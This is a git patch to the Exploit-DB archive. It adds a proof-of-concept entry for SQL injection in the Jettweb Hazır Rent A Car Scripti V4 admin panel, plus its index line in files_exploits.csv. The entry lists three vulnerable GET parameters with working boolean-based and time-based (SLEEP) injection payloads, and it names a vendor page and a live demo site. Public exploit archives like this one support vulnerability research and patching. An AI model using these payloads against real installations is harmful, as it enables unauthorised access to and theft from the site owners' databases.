From 4333ceb122a59d49113bf8f3d4256eda21aaa72a Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 28 Mar 2019 05:02:18 +0000
Subject: [PATCH] DB: 2019-03-28
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1 changes to exploits/shellcodes

Jettweb Hazır Rent A Car Scripti V4 - SQL Injection
---
 exploits/php/webapps/46614.txt | 29 +++++++++++++++++++++++++++++
 files_exploits.csv             |  1 +
 2 files changed, 30 insertions(+)
 create mode 100644 exploits/php/webapps/46614.txt

diff --git a/exploits/php/webapps/46614.txt b/exploits/php/webapps/46614.txt
new file mode 100644
index 000000000..87ff0b098
--- /dev/null
+++ b/exploits/php/webapps/46614.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Jettweb Hazır Rent A Car Scripti V4 - SQL Injection
+# Date: 26.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://jettweb.net/u-46-php-hazir-rent-a-car-scripti-v4.html
+# Demo Site: http://rentv4.proemlaksitesi.net/
+# Version: V4
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request:
+http://localhost/[PATH]/admin/index.php?admin=vitestipi&tur=VitesTipi
+Vulnerable Parameter: tur (GET)
+Payload: admin=vitestipi&tur=VitesTipi' AND 2211=2211 AND 'fVeE'='fVeE
+
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/admin/index.php?admin=rez-gor&id=2
+Vulnerable Parameter: id (GET)
+Payload: admin=rez-gor&id=2 AND SLEEP(5)
+
+----- PoC 3: SQLi -----
+
+Request: http://localhost/[PATH]/admin/index.php
+Vulnerable Parameter: ozellikdil (GET)
+Payload:
+admin=ozellikekle&itemid=1&ozellikdil=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&syf=ceviriguncelle&tur=VitesTipi
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e7c8041a0..71610f6e8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41055,3 +41055,4 @@ id,file,description,date,author,type,platform,port
 46610,exploits/php/webapps/46610.txt,"XooDigital - 'p' SQL Injection",2019-03-26,"Ahmet Ümit BAYRAM",webapps,php,80
 46611,exploits/windows/webapps/46611.txt,"Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion",2019-03-26,"Kevin Randall",webapps,windows,
 46612,exploits/php/webapps/46612.txt,"SJS Simple Job Script - SQL Injection / Cross-Site Scripting",2019-03-26,"Ahmet Ümit BAYRAM",webapps,php,80
+46614,exploits/php/webapps/46614.txt,"Jettweb Hazır Rent A Car Scripti V4 - SQL Injection",2019-03-27,"Ahmet Ümit BAYRAM",webapps,php,80